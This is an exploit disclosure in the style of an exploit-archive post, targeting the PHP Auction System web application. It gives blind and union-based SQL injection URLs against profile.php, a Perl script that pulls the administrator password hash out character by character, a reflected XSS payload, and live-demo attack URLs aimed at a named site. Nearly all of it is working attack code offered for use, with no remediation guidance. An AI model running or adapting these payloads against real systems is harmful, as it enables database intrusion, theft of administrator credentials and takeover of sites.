|
######################### #PHPAuctionSystem# ######################### Author:x0r Email:andry2000@hotmail.it Cms:PhpAuctionSystemvnew Cmsprice:$59.99 Demo:http://www.phpauctions.info/demo/ ##########################
BugIn:\profile.php(Blind\Normal Sql Injection)
Exploit(Blind): profile.php?user_id=29%20and%20substring(@@version,1,1)=5--
profile.php?user_id=29%20and%20substring(@@version,1,1)=4-- profile.php?user_id=29and+1=0-- profile.php?user_id=29and+1=1-- Perl Exploit:
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
my $a;
my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; #Put the victim i've used the demo
my @chars = (48..57, 97..102);
for my $i(1..32) {
foreach my $ord(@chars) {
$a = get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");
if($a =~ /coucou/i) {#put the username of the user_id=[id]
syswrite(STDOUT,chr($ord));
$i++;
last;
}
}
}
Sql Injection: profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers-- Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]
LiveDemo:http://www.phpauctions.info/demo/profile.php?user_id=29and substring(@@version,1,1)=4--[False] http://www.phpauctions.info/demo/profile.php?user_id=29and substring(@@version,1,1)=5--[True]
LiveDemo(XSS):
http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script>
Live Demo Sql:
http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--
Greetz:MyGirlfriend...
|
|
|